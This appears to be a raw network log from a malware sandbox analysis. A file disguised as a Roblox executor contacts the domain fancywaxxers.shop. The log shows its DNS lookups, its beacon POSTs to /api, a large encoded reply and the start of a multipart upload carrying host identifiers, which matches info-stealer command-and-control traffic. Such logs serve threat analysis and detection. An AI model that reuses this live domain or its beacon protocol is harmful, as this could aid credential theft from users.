                                                                                        Dec 31, 2024 17:23:15.336997986 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:15.337203026 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.339087009 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.339097023 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:15.339333057 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:15.384015083 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.390537024 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.391273022 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.391308069 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:15.392070055 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.392107010 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:15.392915010 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.392951012 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:15.393071890 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.393110037 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:15.393588066 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.393623114 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:15.393779039 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.393801928 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:15.393811941 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.393825054 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:15.393999100 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.394025087 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:15.394043922 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.394280910 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.394309044 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.402010918 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:15.402168989 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.402201891 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:15.402205944 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.402226925 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:15.402241945 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.402277946 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:15.406722069 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:17.996165037 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:17.996280909 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:17.996340990 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:17.996503115 CET49710443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:17.996526003 CET44349710104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:18.030714035 CET49711443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:18.030755997 CET44349711104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:18.030965090 CET49711443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:18.031116009 CET49711443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:18.031128883 CET44349711104.21.96.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:18.415375948 CET49711443192.168.2.5104.21.96.1
                                                                                        Dec 31, 2024 17:23:25.314273119 CET5237553192.168.2.51.1.1.1
                                                                                        Dec 31, 2024 17:23:25.320036888 CET53523751.1.1.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:25.320125103 CET5237553192.168.2.51.1.1.1
                                                                                        Dec 31, 2024 17:23:25.324908972 CET53523751.1.1.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:25.792817116 CET5237553192.168.2.51.1.1.1
                                                                                        Dec 31, 2024 17:23:25.799599886 CET53523751.1.1.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:25.799662113 CET5237553192.168.2.51.1.1.1
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 31, 2024 17:23:06.437135935 CET5734353192.168.2.51.1.1.1
                                                                                        Dec 31, 2024 17:23:06.451248884 CET53573431.1.1.1192.168.2.5
                                                                                        Dec 31, 2024 17:23:25.312870026 CET53651811.1.1.1192.168.2.5
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 31, 2024 17:23:06.437135935 CET192.168.2.51.1.1.10xe903Standard query (0)fancywaxxers.shopA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 31, 2024 17:23:06.451248884 CET1.1.1.1192.168.2.50xe903No error (0)fancywaxxers.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:23:06.451248884 CET1.1.1.1192.168.2.50xe903No error (0)fancywaxxers.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:23:06.451248884 CET1.1.1.1192.168.2.50xe903No error (0)fancywaxxers.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:23:06.451248884 CET1.1.1.1192.168.2.50xe903No error (0)fancywaxxers.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:23:06.451248884 CET1.1.1.1192.168.2.50xe903No error (0)fancywaxxers.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:23:06.451248884 CET1.1.1.1192.168.2.50xe903No error (0)fancywaxxers.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:23:06.451248884 CET1.1.1.1192.168.2.50xe903No error (0)fancywaxxers.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:23:24.831779957 CET1.1.1.1192.168.2.50xac6eNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 31, 2024 17:23:24.831779957 CET1.1.1.1192.168.2.50xac6eNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                        • fancywaxxers.shop
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.549704104.21.96.14432828C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:23:07 UTC264OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:23:07 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-12-31 16:23:07 UTC1131INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:23:07 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=jav00dhc6m6vu4op8u4b8me3ir; expires=Sat, 26 Apr 2025 10:09:46 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gZK5YPhdS6l85g%2BrZ3UcMg28b5Vceo%2BXXcF%2BweayKv18dHDKtc51RHPPHEJF8TLUiXcLVDvUqq%2BBc3DMu9MM4CUKrNxcliALpixcBpZkmZqJsWF9uJ8IUSbmECrdFuTnYbLKkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fab9cbdcea34363-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1603&rtt_var=616&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1756919&cwnd=238&unsent_bytes=0&cid=14af6b13c608d60f&ts=621&x=0"
                                                                                        2024-12-31 16:23:07 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                        Data Ascii: 2ok
                                                                                        2024-12-31 16:23:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.549705104.21.96.14432828C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:23:08 UTC265OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 51
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:23:08 UTC51OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 26 6a 3d
                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--899083440&j=
                                                                                        2024-12-31 16:23:08 UTC1136INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:23:08 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=p0iauec3bv65keoq65vls8117l; expires=Sat, 26 Apr 2025 10:09:47 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0PlSpnwi00LuMl7HblCz8kAH0QGTz0JuwJ5dWLIIawczw43j1IpPuZQR9teK2Jas2%2BnkTth7rVl3FhLF0uyCDH%2FHXUPpCWGBCgek%2BcA%2FOO%2F9rq1t%2BEjYt3H%2B1qMQGngPRTAPww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fab9cc66917c32e-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4228&recv_bytes=952&delivery_rate=183278&cwnd=178&unsent_bytes=0&cid=054940e41c4e89f3&ts=598&x=0"
                                                                                        2024-12-31 16:23:08 UTC233INData Raw: 31 63 62 33 0d 0a 38 50 55 35 56 4c 7a 53 46 6d 6d 54 41 4f 68 6d 61 34 2f 4a 74 35 53 65 79 2b 73 4c 34 2f 67 4f 4f 30 6f 52 37 38 54 45 2b 4d 6d 4c 31 30 39 32 68 75 59 36 53 2b 42 6c 79 6c 77 66 2f 62 7a 53 75 4c 79 71 6a 79 6e 5a 6e 6d 39 58 4f 58 54 44 35 72 4b 56 36 38 71 54 57 44 6a 50 74 7a 70 4c 39 6e 6a 4b 58 44 44 30 36 39 4c 36 76 50 48 4a 62 6f 6d 61 62 31 63 6f 63 49 53 72 74 4a 53 71 6d 4a 6c 65 50 4e 6d 78 63 67 6a 2f 62 59 30 44 44 75 36 6a 32 66 33 7a 6f 34 59 70 7a 39 70 72 51 57 67 72 7a 59 6d 68 6a 4b 69 39 6c 45 6f 2f 6e 71 38 36 45 72 46 6c 68 6b 52 52 72 61 6a 53 39 76 4b 74 6a 32 43 4c 6b 47 5a 66 4b 58 57 46 74 4b 32 65 6f 5a 69 58 58 54 33 54 75 47 59 46 39 57 71
                                                                                        Data Ascii: 1cb38PU5VLzSFmmTAOhma4/Jt5Sey+sL4/gOO0oR78TE+MmL1092huY6S+Blylwf/bzSuLyqjynZnm9XOXTD5rKV68qTWDjPtzpL9njKXDD069L6vPHJbomab1cocISrtJSqmJlePNmxcgj/bY0DDu6j2f3zo4Ypz9prQWgrzYmhjKi9lEo/nq86ErFlhkRRrajS9vKtj2CLkGZfKXWFtK2eoZiXXT3TuGYF9Wq
                                                                                        2024-12-31 16:23:08 UTC1369INData Raw: 47 42 51 54 75 36 35 75 32 2b 37 48 4a 4d 63 48 4a 58 6c 6f 35 59 70 69 72 74 70 7a 72 6a 64 6c 43 64 74 6d 38 4e 46 4f 78 61 6f 59 4b 44 4f 36 6b 30 76 66 38 75 34 5a 70 67 70 4a 6b 58 53 4a 38 67 71 6d 6f 6b 4b 79 61 6e 6c 77 35 32 62 68 79 42 50 49 69 78 45 51 4f 39 65 75 4e 74 74 79 35 69 6d 71 56 6c 33 30 5a 4e 7a 32 55 35 71 47 57 36 38 72 58 58 54 6a 66 76 58 51 5a 2b 57 6d 42 41 52 76 6d 6f 74 6a 37 2f 4b 53 44 5a 6f 4b 61 61 31 4d 69 66 49 65 69 71 35 65 74 6b 70 63 62 65 4a 36 33 62 45 75 70 49 71 6b 42 47 65 71 6e 77 37 54 47 36 5a 59 6e 6d 4e 70 72 56 57 67 72 7a 61 36 6a 6d 61 69 5a 6d 46 67 2b 31 61 4a 30 47 66 64 76 6a 78 59 50 36 4b 58 66 39 65 36 6a 68 32 2b 43 6b 32 64 51 4c 58 53 4a 35 75 6a 61 72 49 72 58 41 33 62 2f 76 58 38 48 2b 33
                                                                                        Data Ascii: GBQTu65u2+7HJMcHJXlo5YpirtpzrjdlCdtm8NFOxaoYKDO6k0vf8u4ZpgpJkXSJ8gqmokKyanlw52bhyBPIixEQO9euNtty5imqVl30ZNz2U5qGW68rXXTjfvXQZ+WmBARvmotj7/KSDZoKaa1MifIeiq5etkpcbeJ63bEupIqkBGeqnw7TG6ZYnmNprVWgrza6jmaiZmFg+1aJ0GfdvjxYP6KXf9e6jh2+Ck2dQLXSJ5ujarIrXA3b/vX8H+3
                                                                                        2024-12-31 16:23:08 UTC1369INData Raw: 2f 37 6e 56 2b 75 36 6c 67 32 2b 4f 6c 32 41 5a 5a 6a 4f 4b 76 75 62 43 36 37 69 55 54 7a 58 55 38 6b 45 49 2f 32 79 4e 45 6b 6e 79 35 63 79 32 2b 36 58 4a 4d 63 47 58 62 56 45 75 59 59 4b 72 70 5a 53 6c 6e 5a 4a 55 50 74 36 77 65 51 37 31 61 59 45 48 42 4f 6d 35 33 2f 62 30 72 49 68 6a 69 39 6f 69 47 53 39 72 7a 66 37 6d 71 37 79 5a 31 57 34 31 30 4c 35 7a 48 62 46 39 78 42 31 4a 36 71 65 56 72 72 79 6b 67 57 79 45 6c 57 31 54 4a 6e 61 48 71 71 36 55 71 49 43 59 58 7a 62 53 75 48 34 47 2f 32 61 43 44 51 4c 6d 72 64 58 33 39 75 6e 48 4b 59 61 43 4c 41 46 6f 52 34 71 71 71 35 58 70 70 35 52 56 4f 4e 6d 6d 4e 42 53 2f 65 38 6f 44 42 61 33 7a 6c 66 72 31 71 59 4a 6a 68 5a 70 72 56 43 31 77 69 71 57 72 6e 61 47 63 6b 46 38 36 31 37 31 79 43 2f 5a 6d 6a 78 59
                                                                                        Data Ascii: /7nV+u6lg2+Ol2AZZjOKvubC67iUTzXU8kEI/2yNEkny5cy2+6XJMcGXbVEuYYKrpZSlnZJUPt6weQ71aYEHBOm53/b0rIhji9oiGS9rzf7mq7yZ1W410L5zHbF9xB1J6qeVrrykgWyElW1TJnaHqq6UqICYXzbSuH4G/2aCDQLmrdX39unHKYaCLAFoR4qqq5Xpp5RVONmmNBS/e8oDBa3zlfr1qYJjhZprVC1wiqWrnaGckF86171yC/ZmjxY
                                                                                        2024-12-31 16:23:08 UTC1369INData Raw: 66 33 4a 70 35 38 70 6e 74 52 31 47 53 39 2f 7a 66 37 6d 6b 36 4b 41 6d 56 55 2f 30 37 5a 38 44 50 39 76 67 51 49 43 36 71 7a 54 2b 2f 53 6b 6a 47 71 41 6e 6d 5a 4c 4b 33 69 48 71 36 7a 61 35 64 4b 51 51 33 61 47 38 46 4d 48 32 48 4b 52 46 68 2b 74 74 4a 76 76 76 4b 36 46 4b 64 6e 61 62 31 59 68 66 49 57 75 71 5a 57 76 6e 4a 46 64 4f 39 75 2f 66 68 6e 35 62 49 63 50 42 75 61 35 31 66 76 34 70 59 31 68 69 70 41 73 46 32 68 30 6c 65 62 2b 32 70 36 66 6d 46 73 31 79 50 42 72 52 65 67 69 6a 51 68 4a 74 65 76 5a 2b 50 79 6d 68 57 57 4b 6b 6d 31 56 4a 6e 53 49 72 36 36 53 75 5a 4f 54 55 7a 66 51 76 33 55 50 39 47 65 4f 41 77 33 72 70 4a 57 34 76 4b 36 52 4b 64 6e 61 51 33 34 64 4d 61 79 63 35 6f 58 6c 69 39 64 63 4f 70 37 6f 4e 41 66 79 62 6f 49 4c 44 2b 53 6e
                                                                                        Data Ascii: f3Jp58pntR1GS9/zf7mk6KAmVU/07Z8DP9vgQIC6qzT+/SkjGqAnmZLK3iHq6za5dKQQ3aG8FMH2HKRFh+ttJvvvK6FKdnab1YhfIWuqZWvnJFdO9u/fhn5bIcPBua51fv4pY1hipAsF2h0leb+2p6fmFs1yPBrRegijQhJtevZ+PymhWWKkm1VJnSIr66SuZOTUzfQv3UP9GeOAw3rpJW4vK6RKdnaQ34dMayc5oXli9dcOp7oNAfyboILD+Sn
                                                                                        2024-12-31 16:23:08 UTC1369INData Raw: 6d 44 59 6f 57 5a 61 46 77 6e 63 6f 79 67 74 4a 32 69 67 4a 6c 57 4f 64 61 34 66 51 72 31 5a 34 63 43 42 65 65 71 30 76 6a 79 6f 63 6b 6e 77 5a 31 30 47 58 41 7a 72 4c 61 39 69 4c 32 66 74 6c 59 35 6e 71 38 36 45 72 46 6c 68 6b 52 52 72 61 4c 48 38 76 47 37 67 47 36 50 6c 57 39 4c 4b 58 36 47 74 4b 47 56 72 35 57 62 58 54 6e 59 73 58 45 42 2f 57 57 50 44 77 62 68 36 35 75 32 2b 37 48 4a 4d 63 47 30 5a 30 6f 2f 63 49 4f 74 73 49 48 72 6a 64 6c 43 64 74 6d 38 4e 46 4f 78 59 59 45 50 44 65 32 6e 31 66 4c 78 71 5a 74 6d 68 70 31 6c 55 6a 70 35 69 71 47 74 6b 71 43 64 6b 55 6b 36 30 4b 4a 78 47 65 4d 69 78 45 51 4f 39 65 75 4e 74 73 71 75 6d 58 6d 43 32 46 31 50 4b 32 57 47 71 36 72 61 74 4e 79 4f 47 7a 48 53 38 43 78 4c 39 32 32 44 42 77 62 73 6f 74 6e 37 2b
                                                                                        Data Ascii: mDYoWZaFwncoygtJ2igJlWOda4fQr1Z4cCBeeq0vjyocknwZ10GXAzrLa9iL2ftlY5nq86ErFlhkRRraLH8vG7gG6PlW9LKX6GtKGVr5WbXTnYsXEB/WWPDwbh65u2+7HJMcG0Z0o/cIOtsIHrjdlCdtm8NFOxYYEPDe2n1fLxqZtmhp1lUjp5iqGtkqCdkUk60KJxGeMixEQO9euNtsqumXmC2F1PK2WGq6ratNyOGzHS8CxL922DBwbsotn7+
                                                                                        2024-12-31 16:23:08 UTC1369INData Raw: 42 6f 6d 64 58 47 6e 43 57 35 72 6e 55 73 74 4b 51 56 33 61 47 38 48 63 4d 38 6d 4f 41 44 51 58 69 72 4e 48 6b 39 71 36 62 61 49 43 52 59 56 55 6f 66 6f 43 73 70 35 4f 6d 6e 70 70 63 4d 64 47 31 4e 45 57 78 5a 5a 4a 45 55 61 32 4b 32 50 33 77 38 74 4d 70 6e 74 52 31 47 53 39 2f 7a 66 37 6d 6d 71 47 58 6e 56 59 31 30 62 4e 6d 43 76 64 77 69 67 6b 44 2f 36 48 65 38 2f 47 6b 68 47 71 48 6e 47 64 56 4f 6e 71 4e 70 61 33 61 35 64 4b 51 51 33 61 47 38 46 63 63 35 32 69 4e 43 42 2f 6d 71 74 62 67 38 62 6e 4a 4a 38 47 4c 61 30 68 6f 4b 35 75 32 73 5a 32 30 33 49 34 62 4d 64 4c 77 4c 45 76 33 61 34 77 44 44 2b 4f 35 30 50 44 7a 70 6f 42 67 68 5a 4a 76 57 53 78 33 69 71 4f 6c 6c 71 43 56 6c 46 51 79 31 37 35 39 42 4c 45 73 79 67 4d 52 72 66 4f 56 31 2b 65 71 68 57
                                                                                        Data Ascii: BomdXGnCW5rnUstKQV3aG8HcM8mOADQXirNHk9q6baICRYVUofoCsp5OmnppcMdG1NEWxZZJEUa2K2P3w8tMpntR1GS9/zf7mmqGXnVY10bNmCvdwigkD/6He8/GkhGqHnGdVOnqNpa3a5dKQQ3aG8Fcc52iNCB/mqtbg8bnJJ8GLa0hoK5u2sZ203I4bMdLwLEv3a4wDD+O50PDzpoBghZJvWSx3iqOllqCVlFQy1759BLEsygMRrfOV1+eqhW
                                                                                        2024-12-31 16:23:08 UTC277INData Raw: 57 69 45 7a 77 2b 61 68 67 75 76 4b 31 33 73 39 79 4c 56 7a 48 62 4e 58 69 51 6f 48 36 72 32 56 36 63 50 6e 79 57 61 62 32 6a 52 67 4d 54 4f 4b 71 75 62 43 36 34 65 51 57 7a 48 45 70 6e 4d 48 34 47 6d 48 43 43 76 69 72 4d 50 31 38 36 71 59 59 4d 32 52 59 52 6c 6d 4d 34 71 2b 35 73 4c 72 76 5a 42 4e 4e 66 47 7a 5a 51 4b 78 4c 4d 6f 44 48 36 33 7a 6c 63 69 38 75 34 70 35 67 70 56 39 5a 32 67 72 6c 4a 6a 6d 6b 62 32 56 68 31 67 67 31 62 31 34 47 73 38 69 30 6c 42 62 76 2f 6d 48 70 4f 50 70 6c 6c 62 50 32 6d 30 5a 63 45 71 55 35 72 44 61 38 38 44 5a 47 79 53 65 36 44 52 4d 38 6e 43 59 41 67 72 37 71 4a 4c 49 77 6f 36 66 59 34 61 4b 61 30 34 6e 4d 38 50 6d 71 64 72 7a 71 39 64 53 4d 63 57 68 59 67 62 68 5a 63 6f 37 52 36 32 7a 6c 61 36 38 6e 49 70 6e 6a 35 31
                                                                                        Data Ascii: WiEzw+ahguvK13s9yLVzHbNXiQoH6r2V6cPnyWab2jRgMTOKqubC64eQWzHEpnMH4GmHCCvirMP186qYYM2RYRlmM4q+5sLrvZBNNfGzZQKxLMoDH63zlci8u4p5gpV9Z2grlJjmkb2Vh1gg1b14Gs8i0lBbv/mHpOPpllbP2m0ZcEqU5rDa88DZGySe6DRM8nCYAgr7qJLIwo6fY4aKa04nM8Pmqdrzq9dSMcWhYgbhZco7R62zla68nIpnj51
                                                                                        2024-12-31 16:23:08 UTC1369INData Raw: 32 63 65 31 0d 0a 30 55 36 49 73 79 67 41 59 72 66 4f 46 70 4b 66 38 32 6a 37 52 79 48 4d 58 4d 54 4f 62 35 76 37 49 35 64 4b 46 47 32 36 65 39 33 63 5a 34 32 53 4a 45 67 71 71 6c 65 76 52 35 71 53 50 66 70 43 6b 55 6c 34 79 66 6f 75 78 74 39 61 2b 6b 5a 6c 56 4d 63 6a 77 4f 6b 76 2b 49 74 49 39 53 61 58 72 36 72 69 38 73 63 6b 78 77 61 39 76 56 79 5a 30 6d 37 66 72 76 62 47 66 6b 55 77 6e 6e 76 34 30 44 62 45 36 32 45 70 4a 36 62 71 56 72 71 7a 37 30 6a 7a 53 7a 54 77 4c 4e 7a 32 55 35 72 44 61 38 38 44 5a 47 79 53 65 36 44 52 4d 38 6e 43 59 41 67 72 37 71 4a 4c 49 77 6f 65 4f 62 34 53 64 66 42 73 47 65 4a 6d 68 35 74 54 72 6e 64 63 44 44 35 37 34 4e 44 53 2f 49 70 4a 45 55 61 32 65 31 76 6a 79 72 70 39 34 7a 4c 52 72 58 79 31 30 6e 65 53 49 6b 62 2b 56
                                                                                        Data Ascii: 2ce10U6IsygAYrfOFpKf82j7RyHMXMTOb5v7I5dKFG26e93cZ42SJEgqqlevR5qSPfpCkUl4yfouxt9a+kZlVMcjwOkv+ItI9SaXr6ri8sckxwa9vVyZ0m7frvbGfkUwnnv40DbE62EpJ6bqVrqz70jzSzTwLNz2U5rDa88DZGySe6DRM8nCYAgr7qJLIwoeOb4SdfBsGeJmh5tTrndcDD574NDS/IpJEUa2e1vjyrp94zLRrXy10neSIkb+V
                                                                                        2024-12-31 16:23:08 UTC1369INData Raw: 79 69 63 67 6a 6e 59 63 30 36 4e 38 71 6c 30 76 66 71 75 5a 35 6d 76 36 52 35 57 69 5a 39 69 72 43 33 32 75 58 53 6d 42 74 75 35 2f 41 38 53 38 34 73 79 68 78 4a 74 65 76 67 39 66 4b 6e 6a 6e 2b 51 31 30 74 58 4c 33 4b 62 74 72 47 56 36 39 7a 58 58 58 61 47 34 6a 70 4c 39 58 50 4b 58 46 6d 2f 38 49 43 6c 71 2f 6e 62 64 73 2b 44 4c 45 39 6f 4b 39 2f 6f 35 6f 6a 72 79 74 63 63 4e 63 79 69 63 67 6a 6e 59 63 30 36 4e 38 71 6c 30 76 66 71 75 5a 35 6d 7a 72 52 61 65 42 5a 4e 6d 4b 57 6f 6c 4b 79 45 68 68 74 34 6e 72 38 30 55 38 67 69 77 6b 51 32 6f 2b 76 4e 74 71 54 70 76 47 71 50 6c 47 74 50 4f 54 36 71 71 4b 47 62 76 59 4b 41 56 48 6e 77 68 6c 56 4c 76 79 4b 4d 52 46 47 2f 35 5a 58 79 37 65 6e 52 4f 64 50 42 4f 51 70 2f 49 39 2b 35 36 49 50 72 68 4e 63 44 5a
                                                                                        Data Ascii: yicgjnYc06N8ql0vfquZ5mv6R5WiZ9irC32uXSmBtu5/A8S84syhxJtevg9fKnjn+Q10tXL3KbtrGV69zXXXaG4jpL9XPKXFm/8IClq/nbds+DLE9oK9/o5ojrytccNcyicgjnYc06N8ql0vfquZ5mzrRaeBZNmKWolKyEhht4nr80U8giwkQ2o+vNtqTpvGqPlGtPOT6qqKGbvYKAVHnwhlVLvyKMRFG/5ZXy7enROdPBOQp/I9+56IPrhNcDZ


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.549706104.21.96.14432828C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:23:09 UTC278OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=2EKJAD3T7WDXL
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 12809
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:23:09 UTC12809OUTData Raw: 2d 2d 32 45 4b 4a 41 44 33 54 37 57 44 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 41 43 37 33 32 39 30 38 37 41 39 32 44 32 45 45 39 30 36 35 46 32 44 36 31 32 45 42 30 43 0d 0a 2d 2d 32 45 4b 4a 41 44 33 54 37 57 44 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 45 4b 4a 41 44 33 54 37 57 44 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 32 45 4b 4a 41 44 33
